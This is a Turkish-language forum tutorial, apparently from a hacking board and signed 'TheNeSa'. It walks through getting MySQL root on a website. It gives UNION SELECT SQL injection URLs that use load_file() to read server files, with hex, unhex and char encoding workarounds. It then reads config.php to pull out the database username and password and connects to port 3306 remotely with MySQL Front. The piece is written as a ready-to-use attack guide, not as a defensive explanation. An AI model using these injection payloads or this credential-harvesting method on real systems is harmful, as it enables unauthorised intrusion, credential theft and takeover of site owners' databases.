mysql Root

s.a arkadaşlar mysql root anlatacağım

mysql root için load_file okumamız l

azım onun içinde mysql.user'in olması lazım.

mysql.user'in olsuğunu varsayalım.

column sayılarını eşitlenmiş farzediyosrus

:D buraları anlatmıştık :D

sitemiz thenesa.com/nesa.php?id=-9999 union select 1,2,3--

şimdi load_file içinde sitenin uzantısını bilmek gerekiyo

hatadan /home/thenesa/httpdocs/nesa.php uzantısı aldık.

şimdi bunu okuyalım.

thenesa.com/nesa.php?id=-9999 union select 1,load_file('/home/thenesa/httpdocs/nesa.php'),3--

magic var farzedelim

thenesa.com/nesa.php?id=-9999 union select 1,load_file(0xhexlenmiş hali:D),3--

yine olmadı şimdi

thenesa.com/nesa.php?id=-9999 union select 1,unhex(hex(load_file(0xhexlenmiş hali:D))),3--

yine olmassa charlayın

thenesa.com/nesa.php?id=-9999 union select 1,load_file(char bilmem ne :D),3--

oda olmadı

thenesa.com/nesa.php?id=-9999 union select 1,load_file(char bilmem ne :D),3--

unhex yaptıkya benzerini charla yapın yani

full char v.s v.s olur yani tabi mysql.user varsa.

şimid okuduk. baktık sitede config.php var :D

onu okuyak şimdi . /home/thenesa/httpdocs/config.php

onuda okuduk yukardaki gibi :D

baktık karşımıza

şöle bişe çıktı

// database server
$forum_server = “localhost”; //
// database user name
$forum_un = “root”;
// database password
$forum_pw = “root”;
// database name
$forum_database = “sqldb”;
?>


burdan db user name root pass root olduğunu öğreniyoruz.

öğrenelim :D

user root pass root :D

onlarıda aldık şimdi sitenin ip sini alıp

(ip almayı biliyosnuz dimi :D ping le :D)

MySQL Front v.b programlarla siteye bağlanıp root olcas

ama burdada bi güvenlik sorunu var

bağlana bilmem için sistemin 3306 portunun

açık olması lazım. eğer portumuzda açıksa

MySQL Front v.b programlarla bağlnıp

istediğimiz herşeyi yapabilirs.

kolay gelsin.

not: biras özet anlattım ayrıntılarda

load_file okumalarında sorun yaşarsanız onuda

ayrıntısıyla anlatırım istek olursa tabi.

işte mysql front Download

by TheNeSa